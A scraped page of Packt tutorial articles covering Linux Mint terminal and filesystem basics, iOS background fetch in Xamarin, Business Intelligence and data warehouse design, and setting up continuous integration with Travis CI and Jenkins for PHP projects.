day. Notice that the command prints the working directly and completes it. This means that it returns you right back to the prompt, ready to accept another command. Next, try the ls command. (That's "L" and "S", both lowercase). This stands for list storage. When you execute the ls command, you should see a list of the files saved in your current working directory. If there are no files in your working directory, you'll see no output. For a little bit of fun, try the following command: cowsay Linux Mint is Awesome This command shows that the Mint developers have a sense of humor and included the cowsay program in the default Mint installation. You can make the cow say anything you'd like, but be nice. The following screenshot shows the output of the preceding cowsay command, included in Mint for laughs: Navigating the filesystem Before we continue with more advanced terminal usage, it's important to understand how the filesystem is laid out in Linux as well as how to navigate it. First, we must clarify what exactly is meant by the term "filesystem" as it can refer to different things depending on the context. If you recall, when you installed Linux Mint, you formatted one or more partitions with a filesystem, most likely ext4. In this context, we're referring to the type of formatting applied to a hard-disk partition. There are many different filesystems available for formatting hard disk partitions, and this is true for all operating systems. However, there is another meaning to "filesystem" with regards to Linux. In the context of this article, filesystem refers to the default system of directories (also known as folders) in a Linux installation and how to navigate from one folder to another. The filesystem in an installed Linux system includes many different folders, each with its own purpose. In order to understand how to navigate between directories in a Linux filesystem, you should first have a basic understanding of what the folders are for. You can view the default directory structure in the Linux filesystem in one of the following two ways: One way is to open the Nemo file manager and click on File System on the left-hand side of the window. This will open a view of the default folders in Linux, as shown in the following screenshot: Additionally, you can execute the following command from your terminal emulator: ls -l / The following screenshot shows the output of the preceding command from the root of the filesystem: The first point to understand, especially if you're coming from Windows, is that there is no drive lettering in Linux. This means that there is no C drive for your operating system or D drive for your optical drive. The closest thing that the Linux filesystem has for a C: drive is a single forward slash, which represents the beginning of the filesystem. In Linux, everything is a subdirectory of /. When we executed the preceding command (ls -l /), we were telling the terminal emulator that we'd like a listing of / or the beginning of the drive. The -l flag tells the terminal emulator that we would like a long alphabetical listing rather than a horizontal one. Paths are written as shown in the following command line example. In this example, the path references the Music directory under Joe's home directory: /home/joe/Music The first slash (/home) references the beginning of the filesystem. If a path in Linux is typed starting with a single forward slash, this means that the path starts with the beginning of the drive. In the preceding example, if we start at the beginning of the filesystem, we'll see a directory there named home. Inside the home folder, we'll see another directory named joe. Inside the joe directory, we'll find another directory named Music. The cd command is used to change the directory from the current working directory, to the one that we want to work with. Let's demonstrate this with an example. First, let's say that the prompt Joe sees in his terminal is the following: joe@Mint ~ $ From this, we can deduce that the current working directory is Joe's home directory. We know this because the ~ character is shorthand for the user's home directory. Let's assume that Joe types the following:? pwd Then, his output will be as follows: /home/joe In his case, ~ is the same as /home/joe. Since Joe is currently in his home directory, he can see the contents of that directory by simply typing the following command: ls The Music directory that Joe wants to access would be shown in the output as its path is /home/joe/Music. To change the working directory of the terminal to /home/joe/Music, Joe can type the following: cd /home/joe/Music His prompt will change to the following: joe@Mint ~/Music $ However, the cd command does not make you type the full path. With the cd command, you can type an absolute or relative path. In the preceding command line using cd command, we referenced an absolute path. The absolute path is a path from the beginning of the disk (the single forward slash), and each directory from the beginning is completely typed out. In this example, it's unnecessary to type the full path because Joe is already in his home directory. As Music is a subdirectory of the directory he's already in, all he has to do is type the following command in order to get access to his Music directory: cd Music That's it. Without first typing a forward slash, the command interpreter understands that we are referencing a directory in the current working directory. If Joe was to use /Music as a path instead, this wouldn't work because there is no Music directory at the top level of his hard drive. If Joe wants to go back one level, he can enter the following command: cd.. Typing the cd command along with two periods tells the command interpreter that we would like to move backwards to the level above the one where we currently are. In this case, the command would return Joe back to his home directory. Finally, as if the difference between a filesystem in the context of hard drive formatting and filesystem in the context of directory structure wasn't confusing enough, there is another key term you should know for use with Linux. This term also has multiple meanings that change depending on the context in which you use it. The word is root. The user account named root is present on all Linux systems. The root account is the Alpha and Omega of the Linux system. The root user has the most permissions of any user on the system; root could even delete the entire filesystem and everything contained within it if necessary. Therefore, it's generally discouraged to use the root account for fear of a typo destroying your entire system. However, in regards to this article, when we talk about root, we're not talking about the root user account. There are actually two other meanings to the word root in Linux in regards to the filesystem. First, you'll often hear of someone referring to the root of the filesystem. They are referring to the single forward slash that represents the beginning of the filesystem. Second, there is a directory in the root of the filesystem named root. Its path is as follows: /root Linux administrators will refer to that directory as "slash root", indicating that it is a directory called root, and it is stored in the root (beginning) of the filesystem. So, what is the /root directory? The /root directory is the home directory for the root account. In this article, we have referred to the /home directory several times. In a Linux system, each user gets their own directory underneath /home. David's home directory would be /home/david and Cindy's home directory is likely to be /home/cindy. (Using lowercase for all user names is a common practice for Linux administrators). Notice, however, that there is no /home/root. The root account is special, and it does not have a home directory in /home as normal users would have. /root is basically the equivalent of a home directory for root. The /root directory is not accessible to ordinary users. For example, try the following command: ls /root The ls command by itself displays the contents of the current working directory. However, if we pass a path to ls, we're telling ls that we want to list the storage of a different directory. In the preceding command, we're requesting to list the storage of the /root directory. Unfortunately, we can't. The root account does not want its directories visible to mortal users. If you execute the command, it will give you an error message indicating that permission was denied. Like many Ubuntu-based distributions, the root account in Mint is actually disabled. Even though it's disabled, the /root directory still exists and the root account can be used but not directly logged in to. The takeaway is that you cannot actually log in as root. So far, we've covered the /home and /root subdirectories of /, but what about the rest? This section of the article will be closed with a brief description of what each directory is used for. Don't worry; you don't have to memorize them all. Just use this section as reference. /bin: This stores essential commands accessible to all users. The executables for commands such as ls are stored here. /boot: This stores the configuration information for the boot loader as well as the initial ramdisk for the boot sequence. /dev: This holds the location for devices to represent pieces of hardware, such as hard drives and sound cards. /etc: This stores the configuration files used in the system. Examples include the configuration for Samba, which handles cross-platform networking, as well as the fstab file, which stores mount points for hard disks. /home: As discussed earlier in the article, each user account gets its own directory underneath this directory for storing personal files. /lib: This stores the libraries needed for other binaries. /media: This directory serves as a place for removable media to be mounted. If you insert media (such as a flash drive), you'll find it underneath this directory. /mnt: This directory is used for manual mount points; /media is generally used instead, and this directory still exists as a holdover from the past. /opt: Additional programs can be installed here. /proc: Within /proc, you'll find virtual files that represent processes and kernel data. /root: This is the home directory for the root account. /sbin: This consists of super user program binaries. /tmp: This is a place for temporary files. /usr: This is a directory where utilities and applications can be stored for use by all users, but it is not modified directly by users other than the root user. /var: This is a directory where continually changing files, such as printer spools and logs, are stored.
Read more
  • 0
  • 0
  • 4917

article-image-updating-data-background
Packt
20 May 2014
4 min read
Save for later

Updating data in the background

Packt
20 May 2014
4 min read
(For more resources related to this topic, see here.) Getting ready Create a new Single View Application in Xamarin Studio and name it BackgroundFetchApp. Add a label to the controller. How to do it... Perform the following steps: We need access to the label from outside of the scope of the BackgroundFetchAppViewController class, so create a public property for it as follows: public UILabel LabelStatus { get { return this.lblStatus; } } Open the Info.plist file and under the Source tab, add the UIBackgroundModes key (Required background modes) with the string value, fetch. The following screenshot shows you the editor after it has been set: In the FinishedLaunching method of the AppDelegate class, enter the following line: UIApplication.SharedApplication.SetMinimumBackgroundFetchInterval(UIApplication.BackgroundFetchIntervalMinimum); Enter the following code, again, in the AppDelegate class: private int updateCount;public override void PerformFetch (UIApplication application,Action<UIBackgroundFetchResult> completionHandler){try {HttpWebRequest request = WebRequest.Create("http://software.tavlikos.com") as HttpWebRequest;using (StreamReader sr = new StreamReader(request.GetResponse().GetResponseStream())) {Console.WriteLine("Received response: {0}",sr.ReadToEnd());}this.viewController.LabelStatus.Text =string.Format("Update count: {0}/n{1}",++updateCount, DateTime.Now);completionHandler(UIBackgroundFetchResult.NewData);} catch {this.viewController.LabelStatus.Text =string.Format("Update {0} failed at {1}!",++updateCount, DateTime.Now);completionHandler(UIBackgroundFetchResult.Failed);}} Compile and run the app on the simulator or on the device. Press the home button (or Command + Shift + H) to move the app to the background and wait for an output. This might take a while, though. How it works... The UIBackgroundModes key with the fetch value enables the background fetch functionality for our app. Without setting it, the app will not wake up in the background. After setting the key in Info.plist, we override the PerformFetch method in the AppDelegate class, as follows: public override void PerformFetch (UIApplication application, Action<UIBackgroundFetchResult> completionHandler) This method is called whenever the system wakes up the app. Inside this method, we can connect to a server and retrieve the data we need. An important thing to note here is that we do not have to use iOS-specific APIs to connect to a server. In this example, a simple HttpWebRequest method is used to fetch the contents of this blog: http://software.tavlikos.com. After we have received the data we need, we must call the callback that is passed to the method, as follows: completionHandler(UIBackgroundFetchResult.NewData); We also need to pass the result of the fetch. In this example, we pass UIBackgroundFetchResult.NewData if the update is successful and UIBackgroundFetchResult.Failed if an exception occurs. If we do not call the callback in the specified amount of time, the app will be terminated. Furthermore, it might get fewer opportunities to fetch the data in the future. Lastly, to make sure that everything works correctly, we have to set the interval at which the app will be woken up, as follows: UIApplication.SharedApplication.SetMinimumBackgroundFetchInterval(UIApplication.BackgroundFetchIntervalMinimum); The default interval is UIApplication.BackgroundFetchIntervalNever, so if we do not set an interval, the background fetch will never be triggered. There's more Except for the functionality we added in this project, the background fetch is completely managed by the system. The interval we set is merely an indication and the only guarantee we have is that it will not be triggered sooner than the interval. In general, the system monitors the usage of all apps and will make sure to trigger the background fetch according to how often the apps are used. Apart from the predefined values, we can pass whatever value we want in seconds. UI updates We can update the UI in the PerformFetch method. iOS allows this so that the app's screenshot is updated while the app is in the background. However, note that we need to keep UI updates to the absolute minimum. Summary Thus, this article covered the things to keep in mind to make use of iOS 7's background fetch feature. Resources for Article: Further resources on this subject: Getting Started on UDK with iOS [Article] Interface Designing for Games in iOS [Article] Linking OpenCV to an iOS project [Article]
Read more
  • 0
  • 0
  • 7007
article-image-data-warehouse-design
Packt
20 May 2014
14 min read
Save for later

Data Warehouse Design

Packt
20 May 2014
14 min read
(For more resources related to this topic, see here.) Most companies are establishing or planning to establish a Business Intelligence system and a data warehouse (DW). Knowledge related to the BI and data warehouse are in great demand in the job market. This article gives you an understanding of what Business Intelligence and data warehouse is, what the main components of the BI system are, and what the steps to create the data warehouse are. This article focuses on the designing of the data warehouse, which is the core of a BI system. A data warehouse is a database designed for analysis, and this definition indicates that designing a data warehouse is different from modeling a transactional database. Designing the data warehouse is also called dimensional modeling. In this article, you will learn about the concepts of dimensional modeling. Understanding Business Intelligence Based on Gartner's definition (http://www.gartner.com/it-glossary/business-intelligence-bi/), Business Intelligence is defined as follows: Business Intelligence is an umbrella term that includes the applications, infrastructure and tools, and best practices that enable access to and analysis of information to improve and optimize decisions and performance. As the definition states, the main purpose of a BI system is to help decision makers to make proper decisions based on the results of data analysis provided by the BI system. Nowadays, there are many operational systems in each industry. Businesses use multiple operational systems to simplify, standardize, and automate their everyday jobs and requirements. Each of these systems may have their own database, some of which may work with SQL Server, some with Oracle. Some of the legacy systems may work with legacy databases or even file operations. There are also systems that work through the Web via web services and XML. Operational systems are very useful in helping with day-to-day business operations such as the process of hiring a person in the human resources department, and sale operations through a retail store and handling financial transactions. The rising number of operational systems also adds another requirement, which is the integration of systems together. Business owners and decision makers not only need integrated data but also require an analysis of the integrated data. As an example, it is a common requirement for the decision makers of an organization to compare their hiring rate with the level of service provided by a business and the customer satisfaction based on that level of service. As you can see, this requirement deals with multiple operational systems such as CRM and human resources. The requirement might also need some data from sales and inventory if the decision makers want to bring sales and inventory factors into their decisions. As a supermarket owner or decision maker, it would be very important to understand what products in which branches were in higher demand. This kind of information helps you to provide enough products to cover demand, and you may even think about creating another branch in some regions. The requirement of integrating multiple operational systems together in order to create consolidated reports and dashboards that help decision makers to make a proper decision is the main directive for Business Intelligence. Some organizations and businesses use ERP systems that are integrated, so a question may appear in your mind that there won't be a requirement for integrating data because consolidated reports can be produced easily from these systems. So does that mean that these systems still require a BI solution? The answer in most cases is yes. The companies or businesses might not require a separate BI system for internal and parts of the operations that implemented it through ERP. However, they might require getting some data from outside, for example, getting some data from another vendor's web service or many other protocols and channels to send and receive information. This indicates that there would be a requirement for consolidated analysis for such information, which brings the BI requirement back to the table. The architecture and components of a BI system After understanding what the BI system is, it's time to discover more about its components and understand how these components work with each other. There are also some BI tools that help to implement one or more components. The following diagram shows an illustration of the architecture and main components of the Business Intelligence system: The BI architecture and components differ based on the tools, environment, and so on. The architecture shown in the preceding diagram contains components that are common in most of the BI systems. In the following sections, you will learn more about each component. The data warehouse The data warehouse is the core of the BI system. A data warehouse is a database built for the purpose of data analysis and reporting. This purpose changes the design of this database as well. As you know, operational databases are built on normalization standards, which are efficient for transactional systems, for example, to reduce redundancy. As you probably know, a 3NF-designed database for a sales system contains many tables related to each other. So, for example, a report on sales information may consume more than 10 joined conditions, which slows down the response time of the query and report. A data warehouse comes with a new design that reduces the response time and increases the performance of queries for reports and analytics. You will learn more about the design of a data warehouse (which is called dimensional modeling) later in this article. Extract Transform Load It is very likely that more than one system acts as the source of data required for the BI system. So there is a requirement for data consolidation that extracts data from different sources and transforms it into the shape that fits into the data warehouse, and finally, loads it into the data warehouse; this process is called Extract Transform Load (ETL). There are many challenges in the ETL process, out of which some will be revealed (conceptually) later in this article. According to the definition of states, ETL is not just a data integration phase. Let's discover more about it with an example; in an operational sales database, you may have dozen of tables that provide sale transactional data. When you design that sales data into your data warehouse, you can denormalize it and build one or two tables for it. So, the ETL process should extract data from the sales database and transform it (combine, match, and so on) to fit it into the model of data warehouse tables. There are some ETL tools in the market that perform the extract, transform, and load operations. The Microsoft solution for ETL is SQL Server Integration Service (SSIS), which is one of the best ETL tools in the market. SSIS can connect to multiple data sources such as Oracle, DB2, Text Files, XML, Web services, SQL Server, and so on. SSIS also has many built-in transformations to transform the data as required. Data model – BISM A data warehouse is designed to be the source of analysis and reports, so it works much faster than operational systems for producing reports. However, a DW is not that fast to cover all requirements because it is still a relational database, and databases have many constraints that reduce the response time of a query. The requirement for faster processing and a lower response time on one hand, and aggregated information on another hand causes the creation of another layer in BI systems. This layer, which we call the data model, contains a file-based or memory-based model of the data for producing very quick responses to reports. Microsoft's solution for the data model is split into two technologies: the OLAP cube and the In-memory tabular model. The OLAP cube is a file-based data storage that loads data from a data warehouse into a cube model. The cube contains descriptive information as dimensions (for example, customer and product) and cells (for example, facts and measures, such as sales and discount). The following diagram shows a sample OLAP cube: In the preceding diagram, the illustrated cube has three dimensions: Product, Customer, and Time. Each cell in the cube shows a junction of these three dimensions. For example, if we store the sales amount in each cell, then the green cell shows that Devin paid 23$ for a Hat on June 5. Aggregated data can be fetched easily as well within the cube structure. For example, the orange set of cells shows how much Mark paid on June 1 for all products. As you can see, the cube structure makes it easier and faster to access the required information. Microsoft SQL Server Analysis Services 2012 comes with two different types of modeling: multidimensional and tabular. Multidimensional modeling is based on the OLAP cube and is fitted with measures and dimensions, as you can see in the preceding diagram. The tabular model is based on a new In-memory engine for tables. The In-memory engine loads all data rows from tables into the memory and responds to queries directly from the memory. This is very fast in terms of the response time. The BI semantic model (BISM) provided by Microsoft is a combination of SSAS Tabular and Multidimensional solutions. Data visualization The frontend of a BI system is data visualization. In other words, data visualization is a part of the BI system that users can see. There are different methods for visualizing information, such as strategic and tactical dashboards, Key Performance Indicators (KPIs), and detailed or consolidated reports. As you probably know, there are many reporting and visualizing tools on the market. Microsoft has provided a set of visualization tools to cover dashboards, KPIs, scorecards, and reports required in a BI application. PerformancePoint, as part of Microsoft SharePoint, is a dashboard tool that performs best when connected to SSAS Multidimensional OLAP cube. Microsoft's SQL Server Reporting Services (SSRS) is a great reporting tool for creating detailed and consolidated reports. Excel is also a great slicing and dicing tool especially for power users. There are also components in Excel such as Power View, which are designed to build performance dashboards. Master Data Management Every organization has a part of its business that is common between different systems. That part of the data in the business can be managed and maintained as master data. For example, an organization may receive customer information from an online web application form or from a retail store's spreadsheets, or based on a web service provided by other vendors. Master Data Management (MDM) is the process of maintaining the single version of truth for master data entities through multiple systems. Microsoft's solution for MDM is Master Data Services (MDS). Master data can be stored in the MDS entities and it can be maintained and changed through the MDS Web UI or Excel UI. Other systems such as CRM, AX, and even DW can be subscribers of the master data entities. Even if one or more systems are able to change the master data, they can write back their changes into MDS through the staging architecture. Data Quality Services The quality of data is different in each operational system, especially when we deal with legacy systems or systems that have a high dependence on user inputs. As the BI system is based on data, the better the quality of data, the better the output of the BI solution. Because of this fact, working on data quality is one of the components of the BI systems. As an example, Auckland might be written as "Auckland" in some Excel files or be typed as "Aukland" by the user in the input form. As a solution to improve the quality of data, Microsoft provided users with DQS. DQS works based on Knowledge Base domains, which means a Knowledge Base can be created for different domains, and the Knowledge Base will be maintained and improved by a data steward as time passes. There are also matching policies that can be used to apply standardization on the data. Building the data warehouse A data warehouse is a database built for analysis and reporting. In other words, a data warehouse is a database in which the only data entry point is through ETL, and its primary purpose is to cover reporting and data analysis requirements. This definition clarifies that a data warehouse is not like other transactional databases that operational systems write data into. When there is no operational system that works directly with a data warehouse, and when the main purpose of this database is for reporting, then the design of the data warehouse will be different from that of transactional databases. If you recall from the database normalization concepts, the main purpose of normalization is to reduce the redundancy and dependency. The following table shows customers' data with their geographical information: Customer First Name Last Name Suburb City State Country Devin Batler Remuera Auckland Auckland New Zealand Peter Blade Remuera Auckland Auckland New Zealand Lance Martin City Center Sydney NSW Australia Let's elaborate on this example. As you can see from the preceding list, the geographical information in the records is redundant. This redundancy makes it difficult to apply changes. For example, in the structure, if Remuera, for any reason, is no longer part of the Auckland city, then the change should be applied on every record that has Remuera as part of its suburb. The following screenshot shows the tables of geographical information: So, a normalized approach is to retrieve the geographical information from the customer table and put it into another table. Then, only a key to that table would be pointed from the customer table. In this way, every time the value Remuera changes, only one record in the geographical region changes and the key number remains unchanged. So, you can see that normalization is highly efficient in transactional systems. This normalization approach is not that effective on analytical databases. If you consider a sales database with many tables related to each other and normalized at least up to the third normalized form (3NF), then analytical queries on such databases may require more than 10 join conditions, which slows down the query response. In other words, from the point of view of reporting, it would be better to denormalize data and flatten it in order to make it easier to query data as much as possible. This means the first design in the preceding table might be better for reporting. However, the query and reporting requirements are not that simple, and the business domains in the database are not as small as two or three tables. So real-world problems can be solved with a special design method for the data warehouse called dimensional modeling. There are two well-known methods for designing the data warehouse: the Kimball and Inmon methodologies. The Inmon and Kimball methods are named after the owners of these methodologies. Both of these methods are in use nowadays. The main difference between these methods is that Inmon is top-down and Kimball is bottom-up. In this article, we will explain the Kimball method. You can read more about the Inmon methodology in Building the Data Warehouse, William H. Inmon, Wiley (http://www.amazon.com/Building-Data-Warehouse-W-Inmon/dp/0764599445), and about the Kimball methodology in The Data Warehouse Toolkit, Ralph Kimball, Wiley (http://www.amazon.com/The-Data-Warehouse-Toolkit-Dimensional/dp/0471200247). Both of these books are must-read books for BI and DW professionals and are reference books that are recommended to be on the bookshelf of all BI teams. This article is referenced from The Data Warehouse Toolkit, so for a detailed discussion, read the referenced book. Dimensional modeling To gain an understanding of data warehouse design and dimensional modeling, it's better to learn about the components and terminologies of a DW. A DW consists of Fact tables and dimensions. The relationship between a Fact table and dimensions are based on the foreign key and primary key (the primary key of the dimension table is addressed in the fact table as the foreign key). Summary This article explains the first steps in thinking and designing a BI system. As the first step, a developer needs to design the data warehouse (DW) and needs an understanding of the key concepts of the design and methodologies to create the data warehouse. Resources for Article: Further resources on this subject: Self-service Business Intelligence, Creating Value from Data [Article] Oracle Business Intelligence : Getting Business Information from Data [Article] Business Intelligence and Data Warehouse Solution - Architecture and Design [Article]
Read more
  • 0
  • 0
  • 3221

article-image-continuous-integration
Packt
20 May 2014
14 min read
Save for later

Continuous Integration

Packt
20 May 2014
14 min read
(For more resources related to this topic, see here.) This article is named Continuous Integration; so, what exactly does this mean? You can find many long definitions, but to put it simply, it is a process where you integrate your code with code from other developers and run tests to verify the code functionality. You are aiming to detect problems as soon as possible and trying to fix problems immediately. It is always easier and cheaper to fix a couple of small problems than create one big problem. This can be translated to the following workflow: The change is committed to a version control system repository (such as Git or SVN). The Continuous Integration (CI) server is either notified of, or detects a change and then runs the defined tests. CI notifies the developer if the tests fail. With this method you immediately know who created the problem and when. For the CI to be able to run tests after every commit point, these tests need to be fast. Usually, you can do this with unit tests for integration, and with functional tests it might be better to run them within a defined time interval, for example, once every hour. You can have multiple sets of tests for each project, and another golden rule should be that no code is released to the production environment until all of the tests have been passed. It may seem surprising, but these rules and processes shouldn't make your work any slower, and in fact, should allow you to work faster and be more confident about the developed code functionality and changes. Initial investment pays off when you can focus on adding new functionality and are not spending time on tracking bugs and fixing problems. Also, tested and reliable code refers to code that can be released to the production environment more frequently than traditional big releases, which require a lot of manual testing and verification. There is a real impact on business, and it's not just about the discussion as to whether it is worthwhile and a good idea to write some tests and find yourself restricted by some stupid rules anymore. What will really help and is necessary is a CI server for executing tests and processing the results; this is also called test automation. Of course, in theory you can write a script for it and test it manually, but why would you do that when there are some really nice and proven solutions available? Save your time and energy to do something more useful. In this article, we will see what we can do with the most popular CI servers used by the PHP community: Travis CI Jenkins CI Xinc For us, a CI server will always have the same main task, that is, to execute tests, but to be precise, it includes the following steps: Check the code from the repository. Execute the tests. Process the results. Send a notification when tests fail. This is the bare minimum that a server must handle. Of course, there is much more to be offered, but these steps must be easy to configure. Using a Travis CI hosted service Travis is the easiest to use from the previously mentioned servers. Why is this the case? This is because you don't have to install it. It's a service that provides integration with GitHub for many programming languages, and not just for PHP. Primarily, it's a solution for open source projects, meaning your repository on GitHub is a public repository. It also has commercial support for private repositories and commercial projects. What is really good is that you don't have to worry about server configuration; instead, you just have to specify the required configuration (in the same way you do with Composer), and Travis does everything for you. You are not just limited to unit tests, and you can even specify which database you want to use and run ingratiation tests there. However, there is also a disadvantage to this solution. If you want to use it for a private repository, you have to pay for the service, and you are also limited with regard to the server configuration. You can specify your PHP version, but it's not recommended to specify a minor version such as 5.3.8; you should instead use a major version, such as 5.3. On the other hand, you can run tests against various PHP versions, such as PHP 5.3, 5.4, or 5.5, so when you want to upgrade your PHP version, you already have the test results and know how your code will behave with the new PHP version. Travis has become the CI server of choice for many open source projects, and it's no real surprise because it's really good! Setting up Travis CI To use Travis, you will need an account on GitHub. If you haven't got one, navigate to https://github.com/ and register there. When you have a GitHub account, navigate to https://travis-ci.org/ and click on Sign in with GitHub. As you can see in the preceding screenshot, there will be a Travis application added to your GitHub account. This application will work as a trigger that will start a build after any change is pushed onto the GitHub repository. To configure the Travis project, you have to follow these steps: You will be asked to allow Travis to access your account. When you do this you will go back to the Travis site, where you will see a list of your GitHub repositories. By clicking on On/Off, you can decide which project should be used by Travis. When you click on a project configuration, you will be taken to GitHub to enable the service hook. This is because you have to run a build after every commit, and Travis is going to be notified about this change. In the menu, search for Travis and fill in the details that you can find in your Travis account settings. Only the username and token are required, and the domain is optional. For a demonstration, you can refer to my sample project, where there is just one test suite, and its purpose is to test how Travis works (navigate to https://github.com/machek/travis): Using Travis CI When you link your GitHub account to Travis and set up a project to notify Travis, you need to configure the project. You need to follow the project setup in the same way that we did earlier. To have classes, you are required to have the test suites that you want to run, a bootstrap file, and a phpunit.xml configuration file. You should try this configuration locally to ensure that you can run PHPUnit, execute tests, and make sure that all tests pass. If you cloned the sample project, you will see that there is one important file: .travis.yml. This Travis configuration file is telling Travis what the server configuration should look like, and also what will happen after each commit. Let's have a look at what this file looks like: # see http://about.travis-ci.org/docs/user/languages/php/ for more hints language: php # list any PHP version you want to test against php: - 5.3 - 5.4 # optionally specify a list of environments env: - DB=mysql # execute any number of scripts before the test run, custom env's are available as variables before_script: - if [[ "$DB" == "mysql" ]]; then mysql -e "create database IF NOT EXISTS my_db;" -uroot; fi # omitting "script:" will default to phpunit script: phpunit --configuration phpunit.xml --coverage-text # configure notifications (email, IRC, campfire etc) notifications: email: "your@email" As you can see, the configuration is really simple, and it shows that we need PHP 5.3 and 5.4, and a MySQL database to create a database, execute the PHPUnit with our configuration, and send a report to my e-mail address. After each commit, PHPUnit executes all the tests. The following screenshot shows us an interesting insight into how Travis executes our tests and which environment it uses: You can view the build and the history for all builds. Even though there are no real builds in PHP because PHP is an interpreted language and not compiled, the action performed when you clone a repository, execute PHPUnit tests, and process results is usually called a build. Travis configuration can be much more complex, and you can run Composer to update dependency and much more. Just check the Travis documentation for PHP at http://about.travis-ci.org/docs/user/languages/php/. Using the Jenkins CI server Jenkins is a CI server. The difference between Travis and Jenkins is that when you use Travis as a service, you don't have to worry about the configuration, whereas Jenkins is piece of software that you install on your hardware. This is both an advantage and a disadvantage. The disadvantage is that you have to manually install it, configure it, and also keep it up to date. The advantage is that you can configure it in a way that suits you, and all of the data and code is completely under your control. This can be very important when you have customer code and data (for testing, never use live customer data) or sensitive information that can't be passed on to a third party. The Jenkins project started as a fork of the Hudson project and is written in Java but has many plugins that suit a variety of programming languages, including PHP. In recent years, it has become very popular, and nowadays it is probably the most popular CI server. The reasons for its popularity are that it is really good, can be configured easily, and there are many plugins available that probably cover everything you might need. Installation Installation is a really straightforward process. The easiest method is to use a Jenkins installation package from http://jenkins-ci.org/. There are packages available for Windows, OS X, and Linux, and the installation process is well-documented there. Jenkins is written in Java, which means that Java or OpenJDK is required. After this comes the installation, as you just launch the installation and point it to where it should be installed, and Jenkins is listening on port 8080. Before we move on to configure the first project (or job in Jenkins terminology), we need to install a few extra plugins. This is Jenkins' biggest advantage. There are many plugins and they are very easy to install. It doesn't matter that Jenkins is a Java app as it also serves PHP very well. For our task to execute tests, process results, and send notifications, we need the following plugins: Email-ext: This plugin is used to send notifications Git or Subversion: This plugin is used to check the code xUnit: This plugin is used for processing the PHPUnit test results Clover PHP: This plugin is used for processing the code coverage To install these plugins, navigate to Jenkins | Manage Jenkins | Manage Plugins and select the Available tab. You can find and check the required plugins, or alternatively use the search filter to find the one you need: For e-mails, you might need to configure the STMP server connection at Manage Jenkins | Configure System | E-mail notification section. Usage By now, we should have installed everything that we need, and we can start to configure our first simple project. We can use the same simple project that we used for Travis. This is just one test case, but it is important to learn how to set up a project. It doesn't matter if you have one or thousands of tests though, as the setup is going to be the same. Creating a job The first step is to create a new job. Select New Job from the Jenkins main navigation window, give it a name, and select Build a free-style software project. After clicking on OK, you get to the project configuration page. The most interesting things there are listed as follows: Source Code Management: This is where you check the code Build Triggers: This specifies when to run the build Build: This tests the execution for us Post-build Actions: This publishes results and sends notifications The following screenshot shows the project configuration window in Jenkins CI: Source Code Management Source code management simply refers to your version control system, path to the repository, and the branch/branches to be used. Every build is a clean operation, which means that Jenkins starts with a new directory where the code is checked. Build Triggers Build triggers is an interesting feature. You don't have to use it and you can start to build manually, but it is better to specify when a build should run. It can run periodically at a given interval (every two hours), or you can trigger a build remotely. One way to trigger a build is to use post commit hooks in the Git/SVN repository. A post commit hook is a script that is executed after every commit. Hooks are stored in the repository in the /hooks directory (.git/hooks for Git and /hooks for SVN). What you need to do is create a post-commit (SVN) or post-receive (Git) script that will call the URL given by Jenkins when you click on a Trigger remotely checkbox with a secret token: #!/bin/sh wget http ://localhost:8080/job/Sample_Project/build?token=secret12345ABC-O /dev/null After every commit/push to the repository, Jenkins will receive a request to run the build and execute the tests to check whether all of the tests work and that any code change there is not causing unexpected problems. Build A build is something that might sound weird in the PHP world, as PHP is interpreted and not compiled; so, why do we call it a build? It's just a word. For us, it refers to a main part of the process—to execute unit tests. You have to navigate to Add a build step—click on either Execute Windows batch command or Execute shell. This depends on your operating system, but the command remains the same: phpunit --log-junit=result.xml --coverage-clover=clover.xml This is simple and outputs what we want. It executes tests, stores the results in the JUnit format in the file result.xml, and generates code coverage in the clover format in the file clover.xml. I should probably mention that PHPUnit is not installed with Jenkins, and your build machine on which Jenkins is running must have PHPUnit installed and configured, including PHP CLI. Post-build Actions In our case, there are three post-build actions required. They are listed as follows: Process the test result: This denotes whether the build succeeded or failed. You need to navigate to Add a post-build action | Publish Junit test result report and type result.xml. This matches the switch --log-junit=result.xml. Jenkins will use this file to check the tests results and publish them. Generate code coverage: This is similar to the first step. You have to add the Publish Clover PHP Coverage report field and type clover.xml. It uses a second switch, --coverage-clover=clover.xml, to generate code coverage, and Jenkins uses this file to create a code coverage report. E-mail notification: It is a good idea to send an e-mail when a build fails in order to inform everybody that there is a problem, and maybe even let them know who caused this problem and what the last commit was. This step can be added simply by choosing E-mail notification action. Results The result could be just an e-mail notification, which is handy, but Jenkins also has a very nice dashboard that displays the current status for each job, and you can also see and view the build history to see when and why a build failed. A nice feature is that you can drill down through the test results or code coverage and find more details about test cases and code coverage per class. To make testing even more interesting, you can use Jenkins' The Continuous Integration Game plugin. Every developer receives positive points for written tests and a successful build, and negative points for every build that they broke. The game leaderboard shows who is winning the build game and writing better code.
Read more
  • 0
  • 0
  • 2044
Modal Close icon
Modal Close icon